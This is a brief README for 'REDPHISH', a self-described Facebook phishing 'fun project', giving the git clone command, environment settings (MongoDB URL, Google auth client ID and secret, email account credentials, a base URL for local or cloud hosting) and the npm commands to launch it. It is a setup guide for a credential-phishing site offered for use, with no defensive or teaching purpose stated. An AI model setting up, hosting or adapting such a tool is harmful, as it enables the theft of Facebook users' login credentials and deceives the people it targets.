REDPHISH is a facebook phishing fun project. For more advanced usage use The Social-Engineer Toolkit (SET)
git clone https://github.com/redwine-1/redphish
cd redphish
MONGODBURL: Mongodb connect url
CLIENTID: Google auth client id (optional login using google won't work)
CLIENTSECRET: Google auth client secret (optional login using google won't work)
BASE_ULR: use in local environment http://localhost:3000 or your base URL if you are going to host it in cloud
USERNAME: Email form which email varification code will be sent
PASSWORD: Email password
secret: Secret for local password storage
npm install
node app.js
